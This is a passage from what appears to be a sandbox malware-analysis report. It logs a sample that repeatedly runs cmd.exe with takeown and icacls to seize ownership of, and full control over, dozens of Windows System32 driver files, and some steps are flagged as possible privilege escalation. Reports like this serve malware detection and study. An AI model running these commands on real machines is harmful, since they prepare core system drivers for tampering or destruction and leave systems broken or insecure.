C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\exfat.sys && icacls C:\Windows\System32\drivers\exfat.sys /grant "%username%:F" && exit2⤵PID:4068
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\exfat.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:112
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\exfat.sys /grant "Admin:F"3⤵PID:3324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fastfat.sys && icacls C:\Windows\System32\drivers\fastfat.sys /grant "%username%:F" && exit2⤵PID:3432
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fastfat.sys3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fdc.sys && icacls C:\Windows\System32\drivers\fdc.sys /grant "%username%:F" && exit2⤵PID:3344
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fdc.sys3⤵PID:3448
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fdc.sys /grant "Admin:F"3⤵PID:3932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fileinfo.sys && icacls C:\Windows\System32\drivers\fileinfo.sys /grant "%username%:F" && exit2⤵PID:3936
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fileinfo.sys3⤵PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\filetrace.sys && icacls C:\Windows\System32\drivers\filetrace.sys /grant "%username%:F" && exit2⤵PID:2172
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\filetrace.sys3⤵PID:3984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\flpydisk.sys && icacls C:\Windows\System32\drivers\flpydisk.sys /grant "%username%:F" && exit2⤵PID:1960
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\flpydisk.sys3⤵PID:3336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fltMgr.sys && icacls C:\Windows\System32\drivers\fltMgr.sys /grant "%username%:F" && exit2⤵PID:3680
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fltMgr.sys3⤵
- Modifies file permissions
PID:3340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fsdepends.sys && icacls C:\Windows\System32\drivers\fsdepends.sys /grant "%username%:F" && exit2⤵PID:3596
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fsdepends.sys3⤵PID:1336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fs_rec.sys && icacls C:\Windows\System32\drivers\fs_rec.sys /grant "%username%:F" && exit2⤵PID:3264
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fs_rec.sys3⤵PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fvevol.sys && icacls C:\Windows\System32\drivers\fvevol.sys /grant "%username%:F" && exit2⤵PID:3292
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fvevol.sys3⤵PID:3088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS && icacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "%username%:F" && exit2⤵PID:1908
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3088
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\GAGP30KX.SYS && icacls C:\Windows\System32\drivers\GAGP30KX.SYS /grant "%username%:F" && exit2⤵PID:4060
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\GAGP30KX.SYS3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gm.dls && icacls C:\Windows\System32\drivers\gm.dls /grant "%username%:F" && exit2⤵PID:3276
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\gm.dls3⤵PID:3752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gmreadme.txt && icacls C:\Windows\System32\drivers\gmreadme.txt /grant "%username%:F" && exit2⤵PID:3776
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\gmreadme.txt3⤵PID:3772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hcw85cir.sys && icacls C:\Windows\System32\drivers\hcw85cir.sys /grant "%username%:F" && exit2⤵PID:3400
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hcw85cir.sys3⤵PID:3344
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hcw85cir.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hdaudbus.sys && icacls C:\Windows\System32\drivers\hdaudbus.sys /grant "%username%:F" && exit2⤵PID:3340
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hdaudbus.sys3⤵PID:4164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HdAudio.sys && icacls C:\Windows\System32\drivers\HdAudio.sys /grant "%username%:F" && exit2⤵PID:3496
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\HdAudio.sys3⤵PID:4192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbatt.sys && icacls C:\Windows\System32\drivers\hidbatt.sys /grant "%username%:F" && exit2⤵PID:3180
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidbatt.sys3⤵PID:4208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbth.sys && icacls C:\Windows\System32\drivers\hidbth.sys /grant "%username%:F" && exit2⤵PID:3760
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidbth.sys3⤵PID:4232
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidbth.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidclass.sys && icacls C:\Windows\System32\drivers\hidclass.sys /grant "%username%:F" && exit2⤵PID:3140
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidclass.sys3⤵
- Possible privilege escalation attempt
PID:4276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidir.sys && icacls C:\Windows\System32\drivers\hidir.sys /grant "%username%:F" && exit2⤵PID:4136
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidir.sys3⤵PID:4320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidparse.sys && icacls C:\Windows\System32\drivers\hidparse.sys /grant "%username%:F" && exit2⤵PID:4176
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidparse.sys3⤵
- Possible privilege escalation attempt
PID:4360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidusb.sys && icacls C:\Windows\System32\drivers\hidusb.sys /grant "%username%:F" && exit2⤵PID:4240
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidusb.sys3⤵
- Possible privilege escalation attempt
PID:4400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HpSAMD.sys && icacls C:\Windows\System32\drivers\HpSAMD.sys /grant "%username%:F" && exit2⤵PID:4296
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\HpSAMD.sys3⤵
- Possible privilege escalation attempt
PID:4436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\http.sys && icacls C:\Windows\System32\drivers\http.sys /grant "%username%:F" && exit2⤵PID:4340
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\http.sys3⤵PID:4460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hwpolicy.sys && icacls C:\Windows\System32\drivers\hwpolicy.sys /grant "%username%:F" && exit2⤵PID:4380
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hwpolicy.sys3⤵PID:4520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\i8042prt.sys && icacls C:\Windows\System32\drivers\i8042prt.sys /grant "%username%:F" && exit2⤵PID:4420
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\i8042prt.sys3⤵
- Modifies file permissions
PID:4568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaStorV.sys && icacls C:\Windows\System32\drivers\iaStorV.sys /grant "%username%:F" && exit2⤵PID:4472
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iaStorV.sys3⤵PID:4624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iirsp.sys && icacls C:\Windows\System32\drivers\iirsp.sys /grant "%username%:F" && exit2⤵PID:4500
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iirsp.sys3⤵PID:4660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelide.sys && icacls C:\Windows\System32\drivers\intelide.sys /grant "%username%:F" && exit2⤵PID:4540
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\intelide.sys3⤵PID:4668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelppm.sys && icacls C:\Windows\System32\drivers\intelppm.sys /grant "%username%:F" && exit2⤵PID:4576
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\intelppm.sys3⤵PID:4708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipfltdrv.sys && icacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "%username%:F" && exit2⤵PID:4600
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ipfltdrv.sys3⤵
- Modifies file permissions
PID:4756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\IPMIDrv.sys && icacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "%username%:F" && exit2⤵PID:4636
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\IPMIDrv.sys3⤵PID:4836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipnat.sys && icacls C:\Windows\System32\drivers\ipnat.sys /grant "%username%:F" && exit2⤵PID:4688
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ipnat.sys3⤵
- Possible privilege escalation attempt
PID:4868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\irda.sys && icacls C:\Windows\System32\drivers\irda.sys /grant "%username%:F" && exit2⤵PID:4724
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\irda.sys3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:4924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\irenum.sys && icacls C:\Windows\System32\drivers\irenum.sys /grant "%username%:F" && exit2⤵PID:4768
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\irenum.sys3⤵
- Modifies file permissions
PID:4844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\isapnp.sys && icacls C:\Windows\System32\drivers\isapnp.sys /grant "%username%:F" && exit2⤵PID:4796
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\isapnp.sys3⤵PID:4856
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\isapnp.sys /grant "Admin:F"3⤵PID:4900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdclass.sys && icacls C:\Windows\System32\drivers\kbdclass.sys /grant "%username%:F" && exit2⤵PID:4884
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\kbdclass.sys3⤵
- Possible privilege escalation attempt
PID:5000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdhid.sys && icacls C:\Windows\System32\drivers\kbdhid.sys /grant "%username%:F" && exit2⤵PID:4932
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\kbdhid.sys3⤵
- Possible privilege escalation attempt
PID:3540
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\kbdhid.sys /grant "Admin:F"3⤵PID:4220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ks.sys && icacls C:\Windows\System32\drivers\ks.sys /grant "%username%:F" && exit2⤵PID:4956
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ks.sys3⤵PID:5116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecdd.sys && icacls C:\Windows\System32\drivers\ksecdd.sys /grant "%username%:F" && exit2⤵PID:4988
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksecdd.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5084
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksecdd.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecpkg.sys && icacls C:\Windows\System32\drivers\ksecpkg.sys /grant "%username%:F" && exit2⤵PID:5032
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksecpkg.sys3⤵PID:4212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksthunk.sys && icacls C:\Windows\System32\drivers\ksthunk.sys /grant "%username%:F" && exit2⤵PID:5048
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksthunk.sys3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3752
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksthunk.sys /grant "Admin:F"3⤵PID:4364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lltdio.sys && icacls C:\Windows\System32\drivers\lltdio.sys /grant "%username%:F" && exit2⤵PID:5096
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lltdio.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lltdio.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_fc.sys && icacls C:\Windows\System32\drivers\lsi_fc.sys /grant "%username%:F" && exit2⤵PID:3344
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_fc.sys3⤵PID:4440
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_fc.sys /grant "Admin:F"3⤵PID:4660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas.sys && icacls C:\Windows\System32\drivers\lsi_sas.sys /grant "%username%:F" && exit2⤵PID:4264
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_sas.sys3⤵
- Modifies file permissions
PID:4668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas2.sys && icacls C:\Windows\System32\drivers\lsi_sas2.sys /grant "%username%:F" && exit2⤵PID:4308
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_sas2.sys3⤵
- Modifies file permissions
PID:4908
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_sas2.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:5000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_scsi.sys && icacls C:\Windows\System32\drivers\lsi_scsi.sys /grant "%username%:F" && exit2⤵PID:4392
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_scsi.sys3⤵PID:5116
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_scsi.sys /grant "Admin:F"3⤵PID:4148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\luafv.sys && icacls C:\Windows\System32\drivers\luafv.sys /grant "%username%:F" && exit2⤵PID:4452
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\luafv.sys3⤵PID:4972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mcd.sys && icacls C:\Windows\System32\drivers\mcd.sys /grant "%username%:F" && exit2⤵PID:4616
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mcd.sys3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5060
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mcd.sys /grant "Admin:F"3⤵PID:4236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\megasas.sys && icacls C:\Windows\System32\drivers\megasas.sys /grant "%username%:F" && exit2⤵PID:4756
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\megasas.sys3⤵PID:4900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MegaSR.sys && icacls C:\Windows\System32\drivers\MegaSR.sys /grant "%username%:F" && exit2⤵PID:4596
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MegaSR.sys3⤵
- Possible privilege escalation attempt
PID:4660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\modem.sys && icacls C:\Windows\System32\drivers\modem.sys /grant "%username%:F" && exit2⤵PID:4848
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\modem.sys3⤵PID:4952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\monitor.sys && icacls C:\Windows\System32\drivers\monitor.sys /grant "%username%:F" && exit2⤵PID:4948
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\monitor.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4624
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\monitor.sys /grant "Admin:F"3⤵PID:5076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouclass.sys && icacls C:\Windows\System32\drivers\mouclass.sys /grant "%username%:F" && exit2⤵PID:1600
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mouclass.sys3⤵PID:4972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouhid.sys && icacls C:\Windows\System32\drivers\mouhid.sys /grant "%username%:F" && exit2⤵PID:4524
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mouhid.sys3⤵PID:4236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mountmgr.sys && icacls C:\Windows\System32\drivers\mountmgr.sys /grant "%username%:F" && exit2⤵PID:4672
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mountmgr.sys3⤵
- Modifies file permissions
PID:4376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpio.sys && icacls C:\Windows\System32\drivers\mpio.sys /grant "%username%:F" && exit2⤵PID:5104
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mpio.sys3⤵PID:1320
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mpio.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:5152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpsdrv.sys && icacls C:\Windows\System32\drivers\mpsdrv.sys /grant "%username%:F" && exit2⤵PID:4876
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mpsdrv.sys3⤵PID:4308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxdav.sys && icacls C:\Windows\System32\drivers\mrxdav.sys /grant "%username%:F" && exit2⤵PID:4036
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxdav.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4980
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxdav.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb.sys && icacls C:\Windows\System32\drivers\mrxsmb.sys /grant "%username%:F" && exit2⤵PID:4000
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4400
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxsmb.sys /grant "Admin:F"3⤵PID:5168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb10.sys && icacls C:\Windows\System32\drivers\mrxsmb10.sys /grant "%username%:F" && exit2⤵PID:4352
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb10.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb20.sys && icacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "%username%:F" && exit2⤵PID:4552
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb20.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msahci.sys && icacls C:\Windows\System32\drivers\msahci.sys /grant "%username%:F" && exit2⤵PID:4852
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msahci.sys3⤵
- Modifies file permissions
PID:5296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msdsm.sys && icacls C:\Windows\System32\drivers\msdsm.sys /grant "%username%:F" && exit2⤵PID:4972
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msdsm.sys3⤵PID:5304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msfs.sys && icacls C:\Windows\System32\drivers\msfs.sys /grant "%username%:F" && exit2⤵PID:5144
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msfs.sys3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5320
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msfs.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:5356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf && icacls C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf /grant "%username%:F" && exit2⤵PID:5200
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf3⤵PID:5428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mshidkmdf.sys && icacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "%username%:F" && exit2⤵PID:5232
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mshidkmdf.sys3⤵
- Modifies file permissions
PID:5480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msisadrv.sys && icacls C:\Windows\System32\drivers\msisadrv.sys /grant "%username%:F" && exit2⤵PID:5260
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msisadrv.sys3⤵PID:5472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msiscsi.sys && icacls C:\Windows\System32\drivers\msiscsi.sys /grant "%username%:F" && exit2⤵PID:5312
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msiscsi.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5508
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msiscsi.sys /grant "Admin:F"3⤵PID:5600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mskssrv.sys && icacls C:\Windows\System32\drivers\mskssrv.sys /grant "%username%:F" && exit2⤵PID:5380
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mskssrv.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5520
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mskssrv.sys /grant "Admin:F"3⤵PID:5640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspclock.sys && icacls C:\Windows\System32\drivers\mspclock.sys /grant "%username%:F" && exit2⤵PID:5408
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mspclock.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5532
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mspclock.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:5612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspqm.sys && icacls C:\Windows\System32\drivers\mspqm.sys /grant "%username%:F" && exit2⤵PID:5448
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mspqm.sys3⤵
- Possible privilege escalation attempt
PID:5620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msrpc.sys && icacls C:\Windows\System32\drivers\msrpc.sys /grant "%username%:F" && exit2⤵PID:5496
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msrpc.sys3⤵PID:5840
-
-
-
